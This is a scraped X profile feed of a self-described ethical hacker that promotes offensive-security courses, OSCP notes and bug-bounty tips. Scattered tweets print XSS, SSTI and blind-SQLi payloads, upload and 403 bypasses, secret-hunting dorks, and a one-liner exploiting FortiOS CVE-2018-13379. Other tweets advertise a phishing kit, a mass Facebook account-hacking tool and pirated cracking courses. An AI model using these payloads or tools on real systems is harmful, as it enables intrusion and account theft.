X Profile Banner
X Profile
X

@TheMsterDoctor1

Followers
24,106
Following
600
Media
511
Statuses
1,887

I Characterize Myself as a Retired Hacker. I'm Applying What I Know To Improve Security at Companies Ethical Hacker | AppSec Engineer Team Lead | OSCP

Everywhere
Joined May 2020
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
👁500 TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources 😀 💀Data science 💀Python 💀Artificial Intelligence . 💀AWS Certified . 💀Cloud 💀BIG DATA 💀Data Analytics 💀BI 💀Google Cloud Platform 💀IT Training 💀MBA 💀Machine Learning 💀Deep Learning…
Tweet media one
Tweet media two
Tweet media three
134
2K
6K
Free Offensive Security Notes (OSCP, OSWE, OSEP, OSED) OSCP NOTES AD: OSCP Notes : OSWE Notes: OSEP Notes: OSED Notes: #oscp #osed #oswe #osep #osce ³…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
28
911
3K
The Complete Ethical Hacking Course Beginner to Advanced... "🔐 Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced'! 🚀 Uncover the secrets of cybersecurity, master penetration testing, and become a pro ethical hacker. 💻🛡️ Join the cybersecurity…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
989
935
2K
🤌🤌Free 100+ Hacking / Infosec pdfs 🤌🤌 🚀 If you like my content, please follow and like! 🌟 Let's take this journey to the moon 🚀 and dive into the world of Source: #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty
Tweet media one
15
539
2K
📚 ILLEGAL7 HACKERS ALL COURSES 📚 Software cracking 🟢Advanced software cracking 🟢Cracker Tools 2.8 🟢Dotnet Software Reverse Engineering And Static Analysis Course 🟢Ransomware virus course 🟢Reverse Engineering Course 🟢Software Cracking Course Size : 6.11 GB 100% Free…
Tweet media one
Tweet media two
602
647
1K
OSCP certification* 1.Networking Basics: IP & MAC addresses. TCP, UDP, ports & protocols. OSI model understanding. IP subnetting. 2.Linux Essentials: Kali Linux overview. File system navigation. User privileges. Bash scripting. Intro to Python. 3.Web…
Tweet media one
27
387
1K
97 JSON Tests for for Authentication Endpoints
Tweet media one
9
403
1K
⛔TRYHACKME ROADMAP FOR OSCP⛔ # Level 1 - Intro - [ ] OpenVPN - [ ] Welcome - [ ] Intro to Researching - [ ] Learn Linux - [ ] Crash Course Pentesting …
Tweet media one
Tweet media two
Tweet media three
Tweet media four
18
357
1K
🔒 Elevate your cybersecurity skills with these courses: 1️⃣ Ethical Hacking From Scratch: 1 folder, 2 files 2️⃣ Python & Ethical Hacking: 3 folders, 2 files 3️⃣ Website Hacking & Penetration Testing: 20 folders, 217 files 4️⃣ Ultimate Dark Web, Anonymity, Privacy: 3 folders, 2…
Tweet media one
Tweet media two
699
602
1K
👌👌Uncover the true IP address of websites safeguarded by Cloudflare
Tweet media one
11
257
1K
🚀 Exciting News! 🚀 I've just conquered the Twister machine in my OSCP journey! 🕵️‍♂️💻 👨‍💻 Now, I'm sharing my code and notes to help YOU tackle Twister and ace your OSCP too! 🎯 🔗 Check out ==-Nmap==== nmap -p- -sT -sV -A $IP nmap -p- -sC -sV $IP --0pen nmap -p- --script=vuln…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
20
281
1K
Free Google IT Certification Courses in 2023: (Bookmark For Later ) 1. Data Science with Python 2. Create Image Captioning Models 3. Encoder-Decoder Architecture 4. Google Cloud Computing…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
15
346
1K
🔥 TRYHACKME ROADMAP FOR OSCP 🔥 🔥 🔥 🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥 # Level 1 - Intro - [ ] OpenVPN - [ ] Welcome - [ ] Intro to Researching - [ ] Learn Linux - [ ] Crash Course…
Tweet media one
21
275
1K
Offensive Security notes 🔥📢 Embarking on the OSCP journey? Check out this insightful guide on "How to Pass OSCP Like a Boss"’. 🚀 #OSCP #Cybersecurity #InfoSec #EthicalHacking If you'd like to receive these notes 100% Free For First 1000 User's.. Simply: 1. Follow (So…
494
429
1K
10 websites that will save you hundreds of hours: [🔖 Bookmark for later]
Tweet media one
10
206
985
I hate recon but here a good tip : 1 - Get the company IPs range X.X.X.X/24 2 - Run nmap -p 80,448,8080 IP/24 -oN file.txt 3 - Use any IP extractor or API in case of automation or bash then save it on IPs.txt 4- run httpx -l IPs.txt -o final.txt 5 - run nuclei -l final.txt
21
255
977
🥵 MONEY MAKING TUTORIALS & ADVANCED D @RKWEB H @CKING  🥵🤯 CONTENT: ▪️Hacking into computer ▪️Hacking streams ▪️Certified ethical hacker ▪️Visa hack ▪️ Ethical Hacking student guide ✔️Link: 📂 ꜰɪʟᴇ ᴘᴀꜱꜱᴡᴏʀᴅ : ꜱᴇʀᴠᴇʀ_ᴢ ⚠️ ꜰᴏʀ…
Tweet media one
5
250
949
The Complete Ethical Hacking Course Beginner to Advanced... "🔐 Excited to announce 'The Complete Ethical Hacking Course - Beginner to Advanced'! 🚀 Uncover the secrets of cybersecurity, master penetration testing, and become a pro ethical hacker. 💻🛡️ Join the cybersecurity…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
17
461
963
🤌 The Complete Ethical Hacking Course (Learn Everything) 💡 🚀🔥What Will You Learn 🚀🔥: 💻 Hacking Lab setup 💻 Kali Linux 101 💻 Anonymity Online 💻 Dark Web 💻 Network Pentesting 💻 Wireless Attacks 💻 Post Connection Attacks 💻 System Pentesting 💻 Attacks On Users 💻…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
13
252
907
🚀🚀Learn Cyber Security from basic to advanced with Cisco! 💻🔒 Join me on this exciting journey and let's level up our cybersecurity skills together. Follow me for regular updates and insights. 🔐🚀 Repo: #CyberSecurity #Hacking #InfoSec #Cisco
Tweet media one
12
256
900
Quick tip to find reflected xss: 1- python3 --domain 2- cat .txt | kxss | grep "< >" | tee unfiltered_param.txt 3- inject simple xss payload: "><img src=x onerror=alert("XSS")> —————————————————- Payloads…
Tweet media one
29
260
884
Offensive Security notes 🔥📢 Welcome to the Linux Privilege Escalation Guide within my OSCP (Offensive Security Certified Professional) notes. 🚀🚀🚀 "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. First 10,000 people are eligible to receive…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
300
366
893
General Enumeration - Nmap Replace $ip with target IP Initial scan nmap -Pn -n -vvv -oN nmap/initial $ip If no ports are found, scan in parts nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip Scan all ports nmap -Pn -n -vvv -p- -oN nmap/allports $ip Targeted scanning nmap…
Tweet media one
16
228
850
Burp Suite 101 For Beginners🔥 #1 - Introduction and Installation: 🔗 #2 - Understanding Navigation, Dashboard, Configuration: 🔗 #3 - Exploring Burp Proxy and Target Specification: 🔗 #4 - Exploring Burp…
9
321
854
🔖Some ways to bypass 403 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips #BugBounty —…
Tweet media one
7
211
816
How to Change IP Every 5 seconds On Linux 1.Clone these 2 GitHub Repos :-   git clone   git clone 2.Then Run this Command   sudo apt-get install tor   sudo service tor start 3.This is working on linux system, Go to this directory…
7
239
809
Offensive Security notes 🔥📢 Welcome to the Linux Privilege Escalation Guide within my OSCP (Offensive Security Certified Professional) notes. 🚀🚀🚀 "Access to my OSCP Linux Privilege Escalation notes is limited to a select group. If you'd like to receive these notes,…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
253
181
784
A Simple Tip for #bugbounty , But a Money Maker 🧐💸🫰 Before you finish your day of hunting: search in all requests and check if the value is equal to `=https`. ----------------------------------------- Request.Query CONTAINS "=https" -----------------------------------------
Tweet media one
Tweet media two
22
190
775
Bug bounty Cheatsheet: XSS SQLi SSRF CRLF CSV-Injection …
Tweet media one
6
267
710
🔥How Hackers Hack CCTV Cameras👌 Repo:
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
175
698
🔐 Unlocking the World of Cybersecurity: OSCP Edition 🔐 🚀 Ready to elevate your cybersecurity game? Look no further! 🚀 🎓 Meet the Ultimate Master Teacher: OSCP 🎓 🔒 What's OSCP, you ask? It's the Offensive Security Certified Professional, a globally recognized…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
625
138
686
Reverse Engineering and exploit development Download 100% Free For First 1000 User's.. Simply: 1. Follow (So I Will Dm) 📥 2. Like and Repost 3. Comment “ Send ” to receive your copies!! 📚
Tweet media one
403
324
672
Bug Bounty Tips!!! IDOR Steps to Reproduce 1.Go to https://example{.}com/ 2.Go to vendor login. 3.Make one attacker account and one victim account. 4.Login as attacker. 5.Go to My Account. 6.Update your profile and intercept your request with burp suite, make sure your foxy…
Tweet media one
11
176
672
Happy Hunting!!!😎😎🚨🚨 SSTI (Server Side Template Injection) Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {2*2}[[7*7]] <%= 7 * 7 %> #{3*3} #{ 3 * 3 } [[3*3]] ${2*2} @(3*3) ${= 3*3} {{= 7*7}} ${{7*7}} #{7*7} [=7*7] {{ request }} {{self}} {{dump(app)}} {{ []…
Tweet media one
0
205
674
Best FREE Online Cyber Security Courses with Certifications: 💥Google Cybersecurity Professional Certificate 💥Introduction to Cybersecurity (Udacity) 💥Introduction to Cyber Security (Skillup) 💥Security…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
206
655
NucleiFuzzer = Nuclei + Paramspider #Red_Team NucleiFuzzer is a powerful automation tool for detecting xss,sqli,ssrf,open-redirect..etc vulnerabilities in web applications. NucleiFuzzer is an automation tool that combines ParamSpider and Nuclei to enhance web application…
Tweet media one
7
171
649
File Upload Bypass -😎😎 Blacklisting Bypass PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem,…
Tweet media one
0
184
646
🖥 Building an Active Directory Lab 🔐 In this guide, we will build an Active Directory environment in a virtualized lab and see how features can be exploited to hack Windows users. Active Directory(AD) is Microsoft’s service to manage Windows domain networks. 95% of Fortune 100…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
7
173
627
[√] Description : Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others. [*]Announcement This project is now a part of MaxPhisher. Further bug fixes and feature addition will be available in that…
6
165
619
💠 Linux Privileges Escalation Techniques (Basic to Advanced) Series 👇 🔗 Part 1: 🔗 Part 2: 🔗 Part 3: 🔗 Part 4: 🔗 Part 5: #OSCP #oscp
Tweet media one
10
206
623
🔖 #SEARCH ENGINES FOR PENTESTERS 01. —> (Server , Vulnerabilities) 02. —> (Dorks) 03. —> (Wifi Networks) 04. —> (Codes Search) 05. —> (Threat Intelligence) 06.…
1
208
612
Free Offensive Security Notes (OSCP, OSWE, OSEP, OSED) and more !!!!!!!!!! 𝐁𝐀𝐒𝐈𝐂 𝐍𝐎𝐓𝐄𝐒 Download : Credit: Joas A Santos #OSWE #OSWEnotes #offensivesecurity #pentest #hacking #redteam #cybersecurity #oscp
Tweet media one
Tweet media two
Tweet media three
Tweet media four
0
220
608
Enumeration Checklist For OSCP Exam👌 Windows Privilege Escalation Checklist👌 Linux Privilege Escalation Checklist👌👌 ACTIVE DIRECTORY ENUMERATION WITH POWERSHELL 😎 PDF link 👇👇 Simply: 1. Follow (So I Will Dm) 📥 2. Like and Repost 3. Comment “ Send ” to receive your…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
194
236
586
Bounty Tips Collected From Twitter✍️✍️
Tweet media one
Tweet media two
Tweet media three
Tweet media four
10
143
567
Blind SQL Injection Detection and Exploitation (Cheat Sheet) Payload list: MySQL Blind (Time Based): 0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z 0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z if(now()=sysdate(),sleep(5),0) 'XOR(if(now()=sysdate(),sleep(5),0))XOR'…
Tweet media one
Tweet media two
Tweet media three
7
165
561
✴️ WORLD MOST DANGEROUS & POWERFULL HACKERS TOOLS - Pish web tool 🔗 Link : - MITM attack tool 🔗 Link : - kill shot pentesting framework 🔗 Link : ▫️Facebook Tool Links - Facebook information…
6
165
555
🧑‍🏫𝘼𝙇𝙇-𝙄𝙉-𝙊𝙉𝙀 𝘼𝙒𝙀𝙎𝙊𝙈𝙀 𝘾𝙔𝘽𝙀𝙍𝙎𝙀𝘾 𝙍𝙀𝙎𝙊𝙐𝙍𝘾𝙀𝙎 #Day9 📌All open source resources •Awesome Red Team Ops :- •Awesome Red Teaming :- •Awesome Red Team ToolKit :- •Awesome Blue…
Tweet media one
3
216
565
Excited to embark on the CEH v11 journey! 🚀 Ready to dive into the world of ethical hacking and enhance my cybersecurity skills. #CEHv11 #EthicalHacking #Cybersecurity 100% Free For First 1000 User's.. Simply: 1. Follow (So I Will Dm) 📥 2. Like and Repost 3. Comment “ Send…
Tweet media one
Tweet media two
353
280
535
Some Shodan Dorks that might useful in Bug Bounty. 1. org:" http://target. com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7.…
Tweet media one
4
164
540
Unlock the power of cybersecurity excellence with FREE CISSP Training! 🚀🔐 🌐 CISSP is a globally recognized certification, and we're offering comprehensive training across 8 Modules: •Security and Risk Management •Asset Security 🤌Security Architecture and Engineering…
Tweet media one
Tweet media two
7
149
527
Best SSRF Bypass List (2022) - Copy ALL headers and paste in your request. - List: - - #cybersecuritytips #CyberSecurity #CTF #bugbounty #bugbountytips
Tweet media one
Tweet media two
8
178
531
🚨 Hurry, download now before the site goes down! 🚨 🔐💻 Learn ETHICAL HACKING From 0 To Hero | Full Guide with 23+ Courses 📚🤖 Ready to become a hacking hero? Explore a comprehensive guide to master the art of #EthicalHacking and Cyber Security. Let's dive into the…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
164
514
OSCP 2023 Exam Preparation Guide by John J Extra Links: …
Tweet media one
6
150
523
Happy Hunting !!!! Curated collection of powerful one-liners tailored for bug bounty hunting, crafted with ♥ by the community. Contribute and enhance your bounty hunting arsenal! ## Quick Guide - **HOST:** Refers to a single hostname, domain, or IP address. - **HOSTS.txt:**…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
151
524
🔒 Taking the OSCP exam soon? I've got you covered! Check out my comprehensive walkthrough and resources, including a step-by-step guide, to ace that exam! 📚 I've explained it all to make your journey easier. Best of luck, folks! 😈Follow me for more cybersecurity tips,…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
5
124
517
🌐 #ESSENTIALS : Dive into the World of Computer Networking, Linux, and Cybersecurity! 🖥️🔒 Are you ready to enhance your IT skills? Check out these amazing resources and courses: 🐧 Linux Concept & Admin 🌐 Intermediate & Advanced Networking 🔐 Cybersecurity Concepts 💻 Basic…
Tweet media one
Tweet media two
9
167
506
Telegram: get the IP address of the interlocutor Learn #Telegram #Tools ——————
9
99
500
🔰🔰 🔰 ABOUT THE TOOL 🔰 ▪️This tool is made to hack Facebook. This tool created for hacking multibul facebook accounts useing the facebook api if want to hack a lot of facebook accounts this your tool you can use this tool on any python 2.7 installed…
Tweet media one
4
128
490
Hey Hackers & Bounty Hunters, Here's the website (Tool) which helps you to enumerate web during testing by providing URL Visit: #infosec #Hacking #recon #bugbountytips #enumerate #BugBounty #CyberSecurity #CTF #pwn #software
Tweet media one
5
153
487
🔥🔥Github-Dork🚀🚀🔥🔥 Happy Hunting 🔍 api_key 🔍 app_AWS_SECRET_ACCESS_KEY 🔍 app_secret 🔍 authoriztion 🔍 Ldap 🔍 aws_access_key_id 🔍 secret 🔍 bash_history 🔍 bashrc%20password 🔍 beanstalkd 🔍 client secre 🔍 composer 🔍 config 🔍 credentials 🔍 DB_PASSWORD 🔍 dotfiles…
4
112
496
200+ Hacking / Infosec pdfs Remember, always use this knowledge ethically and legally to make the digital realm safer for all! Check it out here : please follow me🚀🚀 like ❤️❤️❤️ Share this post to spread the word! 👍 #Infosec #Cybersecurity
Tweet media one
7
135
478
🔒 Ready to dive into the world of cybersecurity? Check out this fantastic 🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀🚀 👉90-Day Cybersecurity Study Plan! 👈 📚💻 This repository offers a comprehensive roadmap to help you master essential cybersecurity concepts and technologies. With a…
Tweet media one
2
122
483
vulnerability checklist This repo contain a lot of vulnerability checklist 1.AEM misconfiguration 2.Authentication 3.IDOR Logic 5.jire vulnerability 6.register vulnerability 7.2FA bypassing 8.admin panal 9.exif vulnerability 10.cookie attack 11.reset…
Tweet media one
6
147
476
Burp Suite 101 For Beginners 📷 #1 - Introduction and Installation: 📷 #2 - Understanding Navigation, Dashboard, Configuration: 📷 #3 - Exploring Burp Proxy and Target Specification: 📷 #4 - Exploring…
1
152
482
Bug Bounty Tips!!! 😎😎😎👌👌👌👌 SSRF on Steroids 🔥🔥☄️☄️☄️☄️☄️ Methodology Step 1: Subdomain Enumeration •DNS Dumpster •Sublist3r •Amass •Google Dorking •Certificate Transparency Logs •subdomainer Step 2: Find Live Domains cat all-domains.txt | httpx > all-live.txt…
Tweet media one
5
131
480
Excited to embark on the CEH v12 journey! 🚀 Ready to dive into the world of ethical hacking and enhance my cybersecurity skills. #CEHv12 #EthicalHacking #Cybersecurity 100% Free For First 1000 User's.. Simply: 1. Follow (So I Will Dm) 📥 2. Like and Repost 3. Comment “ Send…
Tweet media one
Tweet media two
Tweet media three
314
241
453
Recon Tool: go-dork🔥🔥☄️☄️ #Day5 Go-dork by dwisiswant0 is a powerful and efficient command-line tool written in the Go programming language. It is designed to be the fastest dork scanner available, streamlining the process of conducting advanced Google dork queries. The…
5
114
464
The Art of Web Reconnaissance and Bug Bounty Learning Drive 📁. ◾Domain Enumeration ◾Port Scanning ◾Vulnerability Scanning ◾Content Discovery ◾Passive Enumeration & More Link: 👉decryption key : JRmgMNgy9BqjrVNBq6VyUQ
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
131
458
😎👌Dive into the realm of cybersecurity like never before with the 😉😉Red Team Blueprint – a unique guide to ethical hacking mastery. 🔥Uncover the secrets of penetration testing and fortify your defenses. Let's explore the world of ethical hacking together! 💻🔒 Follow…
Tweet media one
Tweet media two
Tweet media three
233
192
431
# Bypass 403 (Forbidden) 1. Using "X-Original-URL" header ``` GET /admin HTTP/1.1 Host: ``` Try this to bypass ``` GET /anything HTTP/1.1 Host: X-Original-URL: /admin ``` 2. Appending **%2e** after the first slash ```…
Tweet media one
0
147
455
Cerbrutus - (SSH Bruteforcing) - Much faster & reliable than any other existing solutions. We've tested it against Hydra with over a 200% speed improvement. (SMB, FTP, HTTP, coming soon!) - Repo: - #CyberSecurity #CTF #BugBounty #bugbountytips #infosec
Tweet media one
1
113
440
OSCP Resources to Exam 2023🚀🚀 Privilege Escalation Course - Windows - Linux OSCP 2023 Details OSCP Tricks 2023 by RodolfoMariano Survived OSCP 2023 How…
Tweet media one
Tweet media two
2
166
435
😎😎FBI-TOOLS!!!😎😎 #DAY13 OSINTk.o is a customized Kali Linux-based ISO image with pre-installed packages and scripts CyberPunkOS is a virtual machine that incorporates several tools for Open Source Intelligence (OSINT) to dismantle Fake News…
7
130
435
LinWinPwn - Active Directory Vulnerability Scanner - Scan with the help of impacket, bloodhound, crackmapexec, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, and more. - Repo: - - #CyberSecurity #infosec #CTF #windows #AD #bugbountytips
Tweet media one
5
119
425
😳😳Probably the best thing you'll see today.🤯🤯 🔒 Free Offensive Security Notes PDF Courses + Video on OSCP, OSWE, OSEP, OSED, OSDA, OSWA, OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12, CCC , CKLP, Cisco CCNA 200-125 and more! 🌐 Found Interesting Information! 🌐…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
14
92
417
Bug Bounty Tips!!!! Host Header Injection on https://example{.}com/Account/ForgotPassword Steps to Reproduce 1.Go to this domain: https://example{.}com 2.Go to vendor login. 3.Create a test account. 4.Go to Forgot Password Reset: https://examle{.}/Account/ForgotPassword…
Tweet media one
10
99
420
SQL Injection Cheatsheet Auth Bypass Payloads : ⚔️ #infosec #cybersec #bugbountytips
Tweet media one
2
108
416
nmap -sS -sV -Pn -O -A -sC iptarget -sS: SYN Scan -sV: Version/Service Info -Pn: skip host discovery -O: OS scan -A: OS version Detection -sC: equivalent to --script=default #BugBounty #bugbountytip
Tweet media one
9
129
415
OSCP 2024 Reviews #Day6 PurpleXsec Guide Passing OSCP Passed OSCP in 60 days Crack OSCP in 2024 by Bitten Tech PASSING YOUR OSCP IN 2024 by Matei Josephs OSCP 2024 version — A…
Tweet media one
0
133
416
🔴 𝗥𝗲𝗱 𝗧𝗲𝗮𝗺 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 - 𝐂𝐲𝐛𝐞𝐫 𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 - 𝐂𝐞𝐫𝐭𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬 𝐏𝐫𝐞𝐩𝐚𝐫𝐚𝐭𝐢𝐨𝐧 𝐆𝐮𝐢𝐝𝐞 🛡️ Discover a comprehensive 71-page guide to Red Team Security, Certification Preparation, and more in the realm of #cybersecurity . Elevate your…
Tweet media one
3
102
408
SQLi Authentication Bypass - Master List (2022) - I've gathered a ton of payloads from various sources, load these into your favorite fuzzing tool 🚀 - Link: - - #cybersecuritytips #infosec #CTF #bugbountytips
Tweet media one
6
139
408
🕵️‍♂️ Today's shoutout to bug bounty hunters and penetration testers! 🔍 Here are 5 websites that can level up your game: Links: 1) 2) 3) 4) 5) Happy hunting! 🚀…
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
108
405
🧰UserFinder - OSINT tool for finding profiles by username 🌀Discover profiles across the web with this powerful Open Source Intelligence (OSINT) tool designed specifically for username searches. 🔻Installation: apt update apt upgrade apt install git git clone…
Tweet media one
Tweet media two
2
86
355
97 JSON Tests for Authentication Endpoints API Security Cheatsheet Credit: @d0znpp Source: @SaveToNotion #bugbountytips #bugbounty
Tweet media one
3
123
403
Happy Hunting!!!🔥🔥🔥🔥 Bug bounty Cheatsheet🚨 For more like this, join us at: XSS SQLi SSRF CRLF …
Tweet media one
0
134
388
🔍 #Recon automation for #bughunters 1- Subdomain discovery with Subfinder: ``` subfinder -dL targets.txt -all -recursive -o facebook.txt cat facebook.txt | wc -l ``` 2- Discover subdomains via : ``` curl -s…
Tweet media one
0
144
384
Title :- A path traversal vulnerability in the FortiOS SSL VPN web portal CVE-2018-13379 🪲 httpx -l ips.txt -path "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -status-code -mc 200 #BugBounty #bugbountytip #bugbountytips #Hacking #CyberSecurity
Tweet media one
7
111
384